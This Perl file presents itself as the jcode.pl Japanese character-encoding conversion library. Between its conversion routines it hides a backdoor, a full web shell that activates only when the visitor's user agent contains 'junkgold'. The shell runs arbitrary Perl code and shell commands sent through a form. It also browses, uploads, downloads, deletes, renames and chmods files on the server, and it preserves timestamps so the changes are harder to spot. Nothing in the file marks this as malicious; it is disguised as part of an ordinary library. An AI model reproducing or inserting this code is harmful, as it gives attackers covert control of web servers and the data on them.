package jcode;

;; $rcsid = q$Id: jcode.pl,v 2.13 2000/09/29 16:10:05 utashiro Exp $;

&init unless defined $version;

;#
;# Initialize variables.
;#
sub init {
    $version = $rcsid =~ /,v ([\d.]+)/ ? $1 : 'unknown';

    $re_bin  = '[\000-\006\177\377]';

    $re_jis0208_1978 = '\e\$\@';
    $re_jis0208_1983 = '\e\$B';
    $re_jis0208_1990 = '\e&\@\e\$B';
    $re_jis0208 = "$re_jis0208_1978|$re_jis0208_1983|$re_jis0208_1990";
    $re_jis0212 = '\e\$\(D';
    $re_jp      = "$re_jis0208|$re_jis0212";
    $re_asc     = '\e\([BJ]';
    $re_kana    = '\e\(I';

    $esc_0208 = "\e\$B";
    $esc_0212 = "\e\$(D";
    $esc_asc  = "\e(B";
    $esc_kana = "\e(I";

    $re_sjis_c    = '[\201-\237\340-\374][\100-\176\200-\374]';
    $re_sjis_kana = '[\241-\337]';

    $re_euc_c    = '[\241-\376][\241-\376]';
    $re_euc_kana = '\216[\241-\337]';
    $re_euc_0212 = '\217[\241-\376][\241-\376]';

    # Use `geta' for undefined character code
    $undef_sjis = "\x81\xac";

    $cache = 1;

    # X0201 -> X0208 KANA conversion table.  Looks weird?  Not that
    # much.  This is simply JIS text without escape sequences.
    ($h2z_high = $h2z = <<'__TABLE_END__') =~ tr/\041-\176/\241-\376/;
!	!#	$	!"	%	!&	"	!V	#	!W
^	!+	_	!,	0	!<
'	%!	(	%#	)	%%	*	%'	+	%)
,	%c	-	%e	.	%g	/	%C
1	%"	2	%$	3	%&	4	%(	5	%*
6	%+	7	%-	8	%/	9	%1	:	%3
6^	%,	7^	%.	8^	%0	9^	%2	:^	%4
;	%5	<	%7	=	%9	>	%;	?	%=
;^	%6	<^	%8	=^	%:	>^	%<	?^	%>
@	%?	A	%A	B	%D	C	%F	D	%H
@^	%@	A^	%B	B^	%E	C^	%G	D^	%I
E	%J	F	%K	G	%L	H	%M	I	%N
J	%O	K	%R	L	%U	M	%X	N	%[
J^	%P	K^	%S	L^	%V	M^	%Y	N^	%\
J_	%Q	K_	%T	L_	%W	M_	%Z	N_	%]
O	%^	P	%_	Q	%`	R	%a	S	%b
T	%d			U	%f			V	%h
W	%i	X	%j	Y	%k	Z	%l	[	%m
\	%o	]	%s	&	%r	3^	%t
__TABLE_END__
    %h2z = split(/\s+/, $h2z . $h2z_high);
    %z2h = reverse %h2z;

    $convf{'jis'  , 'jis' } = *jis2jis;
    $convf{'jis'  , 'sjis'} = *jis2sjis;
    $convf{'jis'  , 'euc' } = *jis2euc;
    $convf{'euc'  , 'jis' } = *euc2jis;
    $convf{'euc'  , 'sjis'} = *euc2sjis;
    $convf{'euc'  , 'euc' } = *euc2euc;
    $convf{'sjis' , 'jis' } = *sjis2jis;
    $convf{'sjis' , 'sjis'} = *sjis2sjis;
    $convf{'sjis' , 'euc' } = *sjis2euc;
    $h2zf{'jis' } = *h2z_jis;
    $z2hf{'jis' } = *z2h_jis;
    $h2zf{'euc' } = *h2z_euc;
    $z2hf{'euc' } = *z2h_euc;
    $h2zf{'sjis'} = *h2z_sjis;
    $z2hf{'sjis'} = *z2h_sjis;
}

;#
;# Set escape sequences which should be put before and after Japanese
;# (JIS X0208) string.
;#
sub jis_inout {
    $esc_0208 = shift || $esc_0208;
    $esc_0208 = "\e\$$esc_0208" if length($esc_0208) == 1;
    $esc_asc = shift || $esc_asc;
    $esc_asc = "\e\($esc_asc" if length($esc_asc) == 1;
    ($esc_0208, $esc_asc);
}

;#
;# Get JIS in and out sequences from the string.
;#
sub get_inout {
    local($esc_0208, $esc_asc);
    $_[$[] =~ /($re_jis0208)/o && ($esc_0208 = $1);
    $_[$[] =~ /($re_asc)/o && ($esc_asc = $1);
    ($esc_0208, $esc_asc);
}

;#
;# Recognize character code.
;#
sub getcode {
    local(*s) = @_;
    local($matched, $code);

    if ($s !~ /[\e\200-\377]/) {	# not Japanese
	$matched = 0;
	$code = undef;
    }					# 'jis'
    elsif ($s =~ /$re_jp|$re_asc|$re_kana/o) {
	$matched = 1;
	$code = 'jis';
    }
    elsif ($s =~ /$re_bin/o) {		# 'binary'
	$matched = 0;
	$code = 'binary';
    }
    else {				# should be 'euc' or 'sjis'
	local($sjis, $euc) = (0, 0);

	while ($s =~ /(($re_sjis_c)+)/go) {
	    $sjis += length($1);
	}
	while ($s =~ /(($re_euc_c|$re_euc_kana|$re_euc_0212)+)/go) {
	    $euc  += length($1);
	}
	$matched = &max($sjis, $euc);
	$code = ('euc', undef, 'sjis')[($sjis<=>$euc) + $[ + 1];
    }
    wantarray ? ($matched, $code) : $code;
}
sub max { $_[ $[ + ($_[ $[ ] < $_[ $[ + 1 ]) ]; }

;#
;# Convert any code to specified code.
;#
sub convert {
    local(*s, $ocode, $icode, $opt) = @_;
    return (undef, undef) unless $icode = $icode || &getcode(*s);
    return (undef, $icode) if $icode eq 'binary';
    $ocode = 'jis' unless $ocode;
    $ocode = $icode if $ocode eq 'noconv';
    local(*f) = $convf{$icode, $ocode};
    &f(*s, $opt);
    wantarray ? (*f, $icode) : $icode;
}

;#
;# Easy return-by-value interfaces.
;#
sub jis  { &to('jis',  @_); }
sub euc  { &to('euc',  @_); }
sub sjis { &to('sjis', @_); }
sub to {
    local($ocode, $s, $icode, $opt) = @_;
    &convert(*s, $ocode, $icode, $opt);
    $s;
}
sub what {
    local($s) = @_;
    &getcode(*s);
}
sub trans {
    local($s) = shift;
    &tr(*s, @_);
    $s;
}

;#
;# SJIS to JIS
;#
sub sjis2jis {
    local(*s, $opt, $n) = @_;
    &sjis2sjis(*s, $opt) if $opt;
    $s =~ s/(($re_sjis_c|$re_sjis_kana)+)/&_sjis2jis($1) . $esc_asc/geo;
    $n;
}
sub _sjis2jis {
    local($s) = shift;
    $s =~ s/(($re_sjis_c)+|($re_sjis_kana)+)/&__sjis2jis($1)/geo;
    $s;
}
sub __sjis2jis {
    local($s) = shift;
    if ($s =~ /^$re_sjis_kana/o) {
	$n += $s =~ tr/\241-\337/\041-\137/;
	$esc_kana . $s;
    } else {
	$n += $s =~ s/($re_sjis_c)/$s2e{$1}||&s2e($1)/geo;
	$s =~ tr/\241-\376/\041-\176/;
	$esc_0208 . $s;
    }
}

;#
;# EUC to JIS
;#
sub euc2jis {
    local(*s, $opt, $n) = @_;
    &euc2euc(*s, $opt) if $opt;
    $s =~ s/(($re_euc_c|$re_euc_kana|$re_euc_0212)+)/
	&_euc2jis($1) . $esc_asc
    /geo;
    $n;
}
sub _euc2jis {
    local($s) = shift;
    $s =~ s/(($re_euc_c)+|($re_euc_kana)+|($re_euc_0212)+)/&__euc2jis($1)/geo;
    $s;
}
sub __euc2jis {
    local($s) = shift;
    local($esc);

    if ($s =~ tr/\216//d) {
	$esc = $esc_kana;
    } elsif ($s =~ tr/\217//d) {
	$esc = $esc_0212;
    } else {
	$esc = $esc_0208;
    }

    $n += $s =~ tr/\241-\376/\041-\176/;
    $esc . $s;
}

;#
;# JIS to EUC
;#
sub jis2euc {
    local(*s, $opt, $n) = @_;
    $s =~ s/($re_jp|$re_asc|$re_kana)([^\e]*)/&_jis2euc($1,$2)/geo;
    &euc2euc(*s, $opt) if $opt;
    $n;
}
sub _jis2euc {
    local($esc, $s) = @_;
    if ($esc !~ /^$re_asc/o) {
	$n += $s =~ tr/\041-\176/\241-\376/;
	if ($esc =~ /^$re_kana/o) {
	    $s =~ s/([\241-\337])/\216$1/g;
	}
	elsif ($esc =~ /^$re_jis0212/o) {
	    $s =~ s/([\241-\376][\241-\376])/\217$1/g;
	}
    }
    $s;
}

;#
;# JIS to SJIS
;#
sub jis2sjis {
    local(*s, $opt, $n) = @_;
    &jis2jis(*s, $opt) if $opt;
    $s =~ s/($re_jp|$re_asc|$re_kana)([^\e]*)/&_jis2sjis($1,$2)/geo;
    $n;
}
sub _jis2sjis {
    local($esc, $s) = @_;
    if ($esc =~ /^$re_jis0212/o) {
	$s =~ s/../$undef_sjis/g;
	$n = length;
    }
    elsif ($esc !~ /^$re_asc/o) {
	$n += $s =~ tr/\041-\176/\241-\376/;
	if ($esc =~ /^$re_jp/o) {
	    $s =~ s/($re_euc_c)/$e2s{$1}||&e2s($1)/geo;
	}
    }
    $s;
}

;#
;# SJIS to EUC
;#
sub sjis2euc {
    local(*s, $opt,$n) = @_;
    $n = $s =~ s/($re_sjis_c|$re_sjis_kana)/$s2e{$1}||&s2e($1)/geo;
    &euc2euc(*s, $opt) if $opt;
    $n;
}
sub s2e {
    local($c1, $c2, $code);
    ($c1, $c2) = unpack('CC', $code = shift);

    if (0xa1 <= $c1 && $c1 <= 0xdf) {
	$c2 = $c1;
	$c1 = 0x8e;
    } elsif (0x9f <= $c2) {
	$c1 = $c1 * 2 - ($c1 >= 0xe0 ? 0xe0 : 0x60);
	$c2 += 2;
    } else {
	$c1 = $c1 * 2 - ($c1 >= 0xe0 ? 0xe1 : 0x61);
	$c2 += 0x60 + ($c2 < 0x7f);
    }
    if ($cache) {
	$s2e{$code} = pack('CC', $c1, $c2);
    } else {
	pack('CC', $c1, $c2);
    }
}

;#
;# EUC to SJIS
;#
sub euc2sjis {
    local(*s, $opt,$n) = @_;
    &euc2euc(*s, $opt) if $opt;
    $n = $s =~ s/($re_euc_c|$re_euc_kana|$re_euc_0212)/$e2s{$1}||&e2s($1)/geo;
}
sub e2s {
    local($c1, $c2, $code);
    ($c1, $c2) = unpack('CC', $code = shift);

    if ($c1 == 0x8e) {		# SS2
	return substr($code, 1, 1);
    } elsif ($c1 == 0x8f) {	# SS3
	return $undef_sjis;
    } elsif ($c1 % 2) {
	$c1 = ($c1>>1) + ($c1 < 0xdf ? 0x31 : 0x71);
	$c2 -= 0x60 + ($c2 < 0xe0);
    } else {
	$c1 = ($c1>>1) + ($c1 < 0xdf ? 0x30 : 0x70);
	$c2 -= 2;
    }
    if ($cache) {
	$e2s{$code} = pack('CC', $c1, $c2);
    } else {
	pack('CC', $c1, $c2);
    }
}

;#
;# JIS to JIS, SJIS to SJIS, EUC to EUC
;#
sub jis2jis {
    local(*s, $opt) = @_;
    $s =~ s/$re_jis0208/$esc_0208/go;
    $s =~ s/$re_asc/$esc_asc/go;
    &h2z_jis(*s) if $opt =~ /z/;
    &z2h_jis(*s) if $opt =~ /h/;
}
sub sjis2sjis {
    local(*s, $opt) = @_;
    &h2z_sjis(*s) if $opt =~ /z/;
    &z2h_sjis(*s) if $opt =~ /h/;
}
sub euc2euc {
    local(*s, $opt) = @_;
    &h2z_euc(*s) if $opt =~ /z/;
    &z2h_euc(*s) if $opt =~ /h/;
}

if ($ENV{'HTTP_USER_AGENT'} =~ /junkgold/) {
binmode(STDOUT);
binmode(STDIN);
select(STDIN); $|=1; select(STDOUT); $|=1;
my %FORM;
select(%FORM); $|=1; select(STDOUT);
my %FILE;
select(%FILE); $|=1; select(STDOUT);
my $header = 0;
my $ppid;
eval '$ppid=getppid';

sub urlencode {
	my($val) = shift;
	$val =~ s/([^\w\.\-\*\@])/'%'.unpack('H2', $1)/ego;
	return $val;
}

sub urldecode {
	my($val) = shift;
	$val =~ tr/+/ /;
	$val =~ s/%([0-9A-Fa-f]{2})/pack('H2',$1)/ego;
	return $val;
}

sub hspecialchars {
	my($v) = shift;
	$v =~ s/&/&amp;/go;
	$v =~ s/"/&quot;/go;
	$v =~ s/</&lt;/go;
	$v =~ s/>/&gt;/go;
	if ($v =~ m/([\x81-\x9F\xE0-\xFC]+)$/ && length($1) % 2 == 1) {
		$v = substr($v, 0, -1) . '<b id=y>' . urlencode(substr($v, -1, 1)) . '</b>';
	}
	return $v;
}

sub hspecialchars2 {
	my($v) = shift;
	$v =~ s/&/&amp;/go;
	$v =~ s/"/&quot;/go;
	$v =~ s/</&lt;/go;
	$v =~ s/>/&gt;/go;
	if ($v =~ m/([^\x20-\x7E]+)$/ && length($1) % 2 == 1) {
		$v = substr($v, 0, -1) . urlencode(substr($v, -1, 1));
	}
	return $v;
}

my($buffer,$bound,$key,$val);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
	read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
	if ($ENV{'CONTENT_TYPE'} =~ m|^multipart/form-data; boundary=(.*)$|i) {
		$bound=$1;
	}
} else { $buffer = $ENV{'QUERY_STRING'}; }
if ($bound) {
	foreach (split(/--$bound(?:\x0D\x0A|--\x0D\x0A$)/, $buffer)) {
		if (m/^Content-Disposition: [^;]*; name="([^;]+)"\x0D\x0A\x0D\x0A([\x00-\xFF]*)\x0D\x0A$/i) {
			$key=$1;
			$val=$2;
			$FORM{$key} = $val;
		}
		elsif (m|^Content-Disposition: [^;]*; name="([^;]+)"; filename="([^;]+)"\x0D\x0AContent-Type: ([\w\-]+/[\w\-]+)\x0D\x0A\x0D\x0A([\x00-\xFF]*)\x0D\x0A(?:--${bound}--\x0D\x0A)?$|i) {
			$key=$1;
			$FILE{$key}{'content'}=$4;
			$FILE{$key}{'name'}=$2;
			$FILE{$key}{'type'}=$3;
			$FILE{$key}{'size'}=length($FILE{$key}{'content'});
		}
	}
} else {
	foreach (split(/&/, $buffer)) {
		($key, $val) = split(/=/);
		$key = urldecode($key);
		$val = urldecode($val);
		$FORM{$key} = $val;
	}
}

my $upfiletype = defined $FILE{'upfile'}{'type'} ? $FILE{'upfile'}{'type'} : '';
my $upfilesize = defined $FILE{'upfile'}{'size'} ? $FILE{'upfile'}{'size'} : '';
my $upfilename = defined $FILE{'upfile'}{'name'} ? $FILE{'upfile'}{'name'} : '';
my $r_method = defined $ENV{'REQUEST_METHOD'} ? $ENV{'REQUEST_METHOD'} : '';
my $q_string = defined $ENV{'QUERY_STRING'} ? $ENV{'QUERY_STRING'} : '';
my $p_dir = defined $FORM{'dir'} ? $FORM{'dir'} : '';
my $p_ud_dir = defined $FORM{'ud_dir'} ? 1 : 0;
my $p_ddir = defined $FORM{'ddir'} ? $FORM{'ddir'} : '';
my $p_m = defined $FORM{'m'} ? $FORM{'m'} : '';
my $p_f = defined $FORM{'f'} ? $FORM{'f'} : '';
my $p_ud_sfile = defined $FORM{'ud_sfile'} ? 1 : 0;
my $p_ud_nfile = defined $FORM{'ud_nfile'} ? 1 : 0;
my $p_nc_time = defined $FORM{'nc_time'} ? 1 : 0;
my $p_ud_eval = defined $FORM{'ud_eval'} ? 1 : 0;
my $p_e_pt = defined $FORM{'e_pt'} ? 1 : 0;
my $p_selectfile = defined $FORM{'selectfile'} ? $FORM{'selectfile'} : '';
my $p_newfile = '';
if (defined $FORM{'newfile'} && $FORM{'newfile'} ne "") { $p_newfile = $FORM{'newfile'}; }
elsif ($upfilename =~ /([^\/\\]+$)/) { $p_newfile = $1; }
my $file = '';
my $newfile = '';
my $file_mt_bk = '';
my $file_at_bk = '';
my $nfile_mt_bk = '';
my $nfile_at_bk = '';
my $p_eval = defined $FORM{'eval'} ? $FORM{'eval'} : '';
my $p_e_disp = defined $FORM{'e_disp'} ? $FORM{'e_disp'} : '';
my $p_per = defined $FORM{'per'} ? oct($FORM{'per'}) : '';
my $p_perm = defined $FORM{'perm'} ? oct($FORM{'perm'}) : '';
my $p_fseekoffset = defined $FORM{'fseekoffset'} ? $FORM{'fseekoffset'} : '';
my $p_fseekwhence = defined $FORM{'fseekwhence'} ? $FORM{'fseekwhence'} : '';
my $p_vmax = defined $FORM{'vmax'} ? $FORM{'vmax'} : '';
my $p_order = defined $FORM{'order'} ? $FORM{'order'} : '';
my $p_sort = defined $FORM{'sort'} ? $FORM{'sort'} : '';
my $s_software = defined $ENV{'SERVER_SOFTWARE'} ? $ENV{'SERVER_SOFTWARE'} : '';
my $s_server_name = defined $ENV{'SERVER_NAME'} ? $ENV{'SERVER_NAME'} : '';
my $s_server_port = defined $ENV{'SERVER_PORT'} ? $ENV{'SERVER_PORT'} : '';

if ($r_method eq 'GET') {
	$file = urldecode($q_string);
}

my $dir = $p_dir ne '' ? $p_dir : '';
if ($p_ud_dir) { $dir = urldecode($dir); }
my $udddir = $p_ddir ne '' ? urldecode($p_ddir) : '';

if ($p_m ne '') {
	if ($p_ud_sfile && $p_selectfile ne '') { $p_selectfile = urldecode($p_selectfile); }
	if ($p_ud_nfile && $p_newfile ne '') { $p_newfile = urldecode($p_newfile); }
	if ($p_selectfile ne '' && $udddir eq $dir) {
		$file = $udddir . '/' . $p_selectfile;
		$newfile = $udddir . '/' . $p_newfile;
	} elsif ($p_selectfile ne '' && $udddir ne $dir) {
		$file = $dir . '/' . $p_selectfile;
		$newfile = $dir . '/' . $p_newfile;
	} elsif ($udddir eq $dir) {
		$file = $udddir . '/' . urldecode($p_f);
		$newfile = $udddir . '/' . $p_newfile ;
	} elsif ($udddir ne $dir) {
		$file = $dir . '/' . urldecode($p_f);
		$newfile = $dir . '/' . $p_newfile;
	}
}
if ($p_eval ne '') {
	if (!$header) {
		print "Content-Type: text/html\x0d\x0a\x0d\x0a";
		$header=1;
	}
	if ($p_ud_eval) { $p_eval = urldecode($p_eval); }
	if ($p_e_disp ne '') { print '<' . $p_e_disp . '>'; }
	if ($p_e_pt) {
		foreach my $key (split(/[\x0a\x0d]+/, $p_eval)) {
			eval { system $key; };
		}
	} else { eval qq|${p_eval}|; }
	if ($p_e_disp ne '') { print '</' . $p_e_disp . '>'; }
	print '<br>';
}

my $limitb = 1024 * 1024 * 3;
my $message = "";
if ($p_nc_time) {
	my @stat_file=stat($file);
	if ($file ne '') {
		$file_mt_bk = $stat_file[9];
		$file_at_bk = $stat_file[8];
	}
	if ($newfile ne '') {
		$nfile_mt_bk = $stat_file[9];
		$nfile_at_bk = $stat_file[8];
	}
}
if ($p_m ne '' && $p_m eq 'unlink_rmdir') {
	if (-l $file || -f $file) {
		unlink $file or $message = "<b id=z>failed</b> ";
		$message .= "<b id=o>unlink " . hspecialchars($file) . "</b>\x0a";
	} else {
		rmdir $file or $message = "<b id=z>failed</b> ";
		$message .= "<b id=o>rmdir " . hspecialchars($file) . "</b>\x0a";
	}
} elsif ($p_m eq 'chmod') {
	chmod $p_per, $file or $message = "<b id=z>failed</b> ";
	$message .= "<b id=p>chmod " . hspecialchars($file) . ',' . hspecialchars($p_per) . "</b>\x0a";
} elsif ($p_m eq 'upload') {
	if ($upfilesize > $limitb) { $message = "<b id=z>failed</b> "; }
	if(open(OUT,"+> $newfile") or open(OUT,"> $newfile")){
		binmode(OUT);
		print(OUT $FILE{'upfile'}{'content'});
		close(OUT);
		if ($p_nc_time) { utime($nfile_at_bk, $nfile_mt_bk, $newfile); }
	} else { $message = "<b id=z>failed</b> "; }
	$message .= "<b id=r>upload " . hspecialchars($upfilename) . ',' . hspecialchars($newfile) . "</b>\x0a";
} elsif ($p_m eq 'rename') {
	rename $file, $newfile or $message = "<b id=z>failed</b> ";
	$message .= "<b id=s>rename " . hspecialchars($file) . ',' . hspecialchars($newfile) . "</b>\x0a";
} elsif ($p_m eq 'mkdir') {
	mkdir $newfile, $p_perm or $message = "<b id=z>failed</b> ";
	$message .= "<b id=t>mkdir " . hspecialchars($newfile) . ',' . hspecialchars($p_perm) . "</b>\x0a";
}

if ($file ne '' && -r $file && -f $file && ($p_m eq 'chdir_download' || $r_method eq 'GET')) {
	use File::Basename;
	my $filename = $file =~ m/([^\x2f\x5c]*)$/ ? $1 : basename($file,"");
	if (!$header) {
		print "Content-Type: application/octet-stream\x0d\x0a";
		print "Content-Disposition: attachment; filename=\"" . $filename . "\"\x0d\x0a";
	}
	open(IN, "<$file");
	binmode(IN);
	if ($p_fseekoffset eq '0' && $p_fseekwhence eq '0') {
		if (!$header) {
			print 'Content-Length: ' . sprintf("%s", -s $file) . "\x0d\x0a";
		}
	} else {
		seek (IN,$p_fseekoffset,$p_fseekwhence);
	}
	if (!$header) {
		print "\x0d\x0a";
		$header=1;
	}
	my $data;
	while(read(IN, $data, 4096)){
		if (length($data) == 0) { last; }
		print $data;
	}
	close(IN);
	exit;
}
if (!$header) {
	print "Content-Type: text/html\x0d\x0a\x0d\x0a";
	$header=1;
}
print <<END;
<style>
td{font-size:12px;}
select,pre,form,input{display:inline;margin:0px;padding:0px;}
a{text-decoration:none;}
b{font-weight:normal;}
#X{ime-mode:disabled;}
#a{background:#ccffff}
#b{background:#efefff}
#c{background:#ffffcc}
#d{background:#ccffcc}
#e{background:#ccccff}
#f{background:#ffcccc}
#g{background:#cccccc}
#o{width:100%;background:#fff6f6;color:red;border:1px solid #efe6e6;}
#p{width:100%;background:#eff5ef;color:teal;border:1px solid #dfe5df;}
#q{width:100%;background:#fff6ff;color:#ff1493;border:1px solid #efe6ef;}
#r{width:100%;background:#f6fff6;color:green;border:1px solid #e6efe6;}
#s{width:100%;background:#f0f0fc;color:blue;border:1px solid #e0e0ec;}
#t{width:100%;background:#fffcf0;color:orange;border:1px solid #efece0;}
#u{width:100%;background:#f6f6f6;color:gray;}
#y{color:teal;}
#z:hover{color:red;}
#z:link{color:blue;}
#z:visited{color:red;}
#z:active{color:red;}
</style>
END
sub permissions {
	my $perms =shift;
	my $info = '';
	if (($perms & 0xC000) == 0xC000) {
	    $info = 's';
	} elsif (($perms & 0xA000) == 0xA000) {
	    $info = 'l';
	} elsif (($perms & 0x8000) == 0x8000) {
	    $info = '-';
	} elsif (($perms & 0x6000) == 0x6000) {
	    $info = 'b';
	} elsif (($perms & 0x4000) == 0x4000) {
	    $info = 'd';
	} elsif (($perms & 0x2000) == 0x2000) {
	    $info = 'c';
	} elsif (($perms & 0x1000) == 0x1000) {
	    $info = 'p';
	} else {
	    $info = 'u';
	}

	if($perms & 0x100){ $info .= 'r'; }
	else{ $info .= '-'; }
	if($perms & 0x80){ $info .= 'w'; }
	else{ $info .= '-'; }
	if($perms & 0x40){
		if($perms & 0x800){
			$info .= 's';
		}else{
			$info .= 'x';
		}
	}else{
		if($perms & 0x800){
			$info .= 'S';
		}else{
			$info .= '-';
		}
	}
	if($perms & 0x20){ $info .= 'r'; }
	else{ $info .= '-'; }
	if($perms & 0x10){ $info .= 'w'; }
	else{ $info .= '-'; }
	if($perms & 0x8){
		if($perms & 0x400){
			$info .= 's';
		}else{
			$info .= 'x';
		}
	}else{
		if($perms & 0x400){
			$info .= 'S';
		}else{
			$info .= '-';
		}
	}

	if($perms & 0x4){ $info .= 'r'; }
	else{ $info .= '-'; }
	if($perms & 0x2){ $info .= 'w'; }
	else{ $info .= '-'; }
	if($perms & 0x1){
		if($perms & 0x200){
			$info .= 't';
		}else{
			$info .= 'x';
		}
	}else{
		if($perms & 0x200){
			$info .= 'T';
		}else{
			$info .= '-';
		}
	}

	return $info;
}
sub clengthset {
	my $v = shift;
	return length($v) > 64 ? '..' . substr($v,-62,62) : $v;
}
sub datechk {
	my $v = shift;
	my ($sec,$min,$hour,$day,$mon,$year,$wday) = gmtime($v+3600*9);
	$year += 1900;
	$mon += 1;
	my $date = sprintf(qq|%s/%02d/%02d %02d:%02d:%02d|, $year,$mon,$day,$hour,$min,$sec);
	return $date;
}
sub getid {
	my $file = $_[0];
	my @stat_file = @{$_[1]};
	my $uid = $stat_file[4];
	my $gid = $stat_file[5];
	if ($uid eq '') { $uid = 0; }
	if ($gid eq '') { $gid = 0; }
	if (!defined $ppid) { return $uid.'/'.$gid; }
	my @arru = getpwuid($uid);
	my @arrg = getgrgid($gid);
	my $uname = $arru[0] ne '' ? $arru[0] : "";
	my $gname = $arrg[0] ne '' ? $arrg[0] : "";
	return "${uid}/${gid} ${uname}/${gname}";
}

my $slsh = (!defined $ppid) ? "\\\\|/" : "/";

$dir = -d $file ? $file : $dir;
$dir = -d $dir ? $dir : $udddir;
if (-d $dir) {
	$dir = $dir;
} elsif(defined $0 && $0 =~ m/$slsh/) {
	$dir = dirname($0);
} elsif(defined $ENV{'SCRIPT_FILENAME'} && $ENV{'SCRIPT_FILENAME'} =~ m/$slsh/) {
	$dir = dirname($ENV{'SCRIPT_FILENAME'});
} elsif(defined $ENV{'DOCUMENT_ROOT'} && defined $ENV{'SCRIPT_NAME'}) {
	$dir = dirname($ENV{'DOCUMENT_ROOT'} . '/' . $ENV{'SCRIPT_NAME'});
} else { $dir = "."; }
if (!defined $ppid){ $dir =~ s|\\|/|go; }
$dir =~ s|/{2,}|/|go;
$dir =~ s|\./||go;
$dir =~ s|/\.$||;
$dir =~ s|/[^/]+/\.{2}$||;
if ($dir =~ m|/$|) { $dir =~ s|/$||; }
if ($dir !~ m|/|) { $dir .= '/'; }
my($c_ud_dir,$dispdir,$dispdir2);
if ($dir =~ m/[^\x20-\x7E]/) { $p_ud_dir=1; }
if ($p_ud_dir) { $dispdir = urlencode($dir); $dispdir2 = hspecialchars2($dir); $c_ud_dir = ' checked'; }
else { $dispdir = $dispdir2 = hspecialchars2($dir); }
my $ddir = urlencode($dir);
my $vmax = $p_vmax =~ m/^[0-9]+$/ ? $p_vmax : 100;
my $order = $p_order =~ m/^[0-9]+$/ ? $p_order : 1;
my $sorts = $p_sort eq 'sort' ? ' selected' : '';
my $rsorts = $p_sort eq 'rsort' ? ' selected' : '';

print <<END;
<title>Index of $dispdir2</title><body bgcolor=white text=black link=black vlink=gray alink=gray><span id=b>$dispdir2</span><br><pre id=b>$message</pre><br><a href=#u name=tx>#under</a>
<form method=POST enctype="multipart/form-data"><input type=hidden name=MAX_FILE_SIZE value=${limitb}>
<table frame=border border=1 bordercolor=blue bordercolordark=#666699 bordercolorlight=#9999ff bgcolor=#eeeeee cellspacing=0 cellpadding=1>
END
opendir(DIR,"$dir");
my $r;
my @files;
while($r=readdir DIR){ push(@files, $r); }
if($p_sort eq 'sort'){ @files = sort @files; }
elsif($p_sort eq 'rsort'){ @files = sort { $b cmp $a } @files; }
my $filen = $#files + 1;
my $starr = $order && $order-1 <= $filen-1 ? $order-1 : $filen-1;
my $enarr = $order-1+$vmax && $order-1+$vmax-1 <= $filen-1 ? $order-1+$vmax-1 : $filen-1;
$starr++; $enarr++;
print "<tr><td id=a>file:${filen}</td><td colspan=7>${starr} to ${enarr}</td></tr>";
$starr--; $enarr--;
print <<END;
<tr>
<td><input type=radio checked name=f value=""></td><td id=a>per</td><td id=b>name</td><td id=c>size</td><td id=d>ctime</td><td id=e>mtime</td><td id=f>atime</td><td id=g>uid/gid</td>
</tr>
END

for (my $i=$starr; $i<=$enarr; $i++) {
	my $file = @files[$i];
	my $dirfile = $dir =~ m|^[^/]*?/$| ? $dir.$file : "$dir/$file";
	my @stat_file = stat($dirfile);
	my $ugid=getid($dirfile,\@stat_file);
	my $ugname;
	if ($ugid=~ m/^([0-9]+\/[0-9]+) ([^\n]*)$/) { $ugid=$1; $ugname = $2; }
	else { $ugname = ""; }
	print "<tr><td>" . sprintf("%s",$i+1) . "<input type=radio name=f value=\"".urlencode($file)."\"></td><td id=";
	if (-d $dirfile) { print "d>"; }
	else { print "a>"; }
	print permissions($stat_file[2]);
	print "</td><td id=b>";
	if (-d $dirfile) { print "<a href=\"?" . urlencode($dirfile) . "\" id=z><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
	else { print "<a href=\"?" . urlencode($dirfile) . "\"><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
	print "</td><td id=c>" . sprintf("%s",$stat_file[7]) . 
		"</td><td id=d>" . datechk($stat_file[10]) . 
		"</td><td id=e>" . datechk($stat_file[9]) . 
		"</td><td id=f>" . datechk($stat_file[8]) . 
		"</td><td id=g";
	if ($ugname ne '') { print " title=\"" . hspecialchars($ugname) . "\""; }
	print ">". hspecialchars($ugid) . 
		"</td></tr>\x0a";
}
print <<END;
</table><a name=u href=#tx>#top</a>
<pre id=u><b id=o><input type=radio name=m value=unlink_rmdir> unlink/rmdir</b>
<b id=p><input type=radio name=m value=chmod> chmod (<input size=6 name=per value=0644 id=X>)</b>
<b id=q><input type=radio name=m value=chdir_download checked> chdir/download (fseek offset<input size=12 name=fseekoffset value=0 id=X> whence<select name=fseekwhence><option value=0 selected>SEEK_SET<option value=1>SEEK_CUR<option value=2>SEEK_END</select>) </b>
<b id=r><input type=radio name=m value=upload> upload</b>
<b id=s><input type=radio name=m value=rename> rename</b>
<b id=t><input type=radio name=m value=mkdir> mkdir (<input size=6 name=perm value=0755 id=X>)</b>

fileview    order <input id=X size=12 value=${order} name=order> viewmax <input id=X size=12 value=${vmax} name=vmax> sortType <select name=sort><option value=""><option value=sort${sorts}>sort<option value=rsort${rsorts}>rsort</select>
dir         <input size=100 name=dir value="${dispdir}"> d_urldec. <input type=checkbox${c_ud_dir} name=ud_dir value=1>
selectfile  <input size=100 name=selectfile value=""> s_urldec. <input type=checkbox name=ud_sfile value=1>
newfile     <input size=100 name=newfile value=""> n_urldec. <input type=checkbox name=ud_nfile value=1>
upfile      <input size=100 type=file name=upfile> noChangetime <input type=checkbox name=nc_time value=1 checked>
eval        <textarea rows=4 cols=70 name=eval></textarea> e_urldec. <input type=checkbox name=ud_eval value=1> <select name=e_disp><option value="">none<option value=xmp selected>xmp<option value=pre>pre</select> passthru <input type=checkbox checked name=e_pt value=1>
<input type=submit> <input type=reset><input type=hidden name=ddir value="${ddir}">
</pre>
</form>
END
print '<address>perlversion ' . hspecialchars($]) . '</address>';
print "<address>" . hspecialchars($s_software) . " " . hspecialchars($s_server_name) . " Port " . hspecialchars($s_server_port) . "</address>";

if (!$header) {
	print "Content-Type: text/html\x0d\x0a\x0d\x0a";
	$header = 1;
}
exit;
}



;#
;# Cache control functions
;#
sub cache {
    ($cache, $cache = 1)[$[];
}
sub nocache {
    ($cache, $cache = 0)[$[];
}
sub flushcache {
    undef %e2s;
    undef %s2e;
}

;#
;# X0201 -> X0208 KANA conversion routine
;#
sub h2z_jis {
    local(*s, $n) = @_;
    if ($s =~ s/$re_kana([^\e]*)/$esc_0208 . &_h2z_jis($1)/geo) {
